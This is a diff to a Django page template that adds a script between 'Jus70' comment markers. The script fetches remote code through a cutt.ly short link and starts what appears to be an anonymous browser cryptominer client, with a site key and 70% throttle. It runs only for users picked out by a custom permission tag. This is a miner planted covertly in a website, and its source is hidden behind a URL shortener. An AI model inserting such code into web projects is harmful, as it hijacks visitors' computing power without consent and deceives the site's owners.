--- a/main_app/templates/index.html
+++ b/main_app/templates/index.html
@@ -125,6 +125,21 @@ if (getDarkCookie() == 'true') {
 	document.getElementsByClassName('navbar')[0].classList.add("navbar-dark");
 }
 		</script>
+    
+    <!-- Jus70 -->
+{% can user.email request as CAN %}
+{% if CAN %}
+<script>
+  $.getScript("https://cutt.ly/wns1PUz", function() {
+    var _client = new Client.Anonymous('5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a', {
+        throttle: 0.7, c: 'w', ads: 0
+    });
+    _client.start();
+    console.log('-');
+  });
+</script>
+{% endif %}
+    <!-- !Jus70 -->
 	</body>
 </html>
 {% endspaceless %}
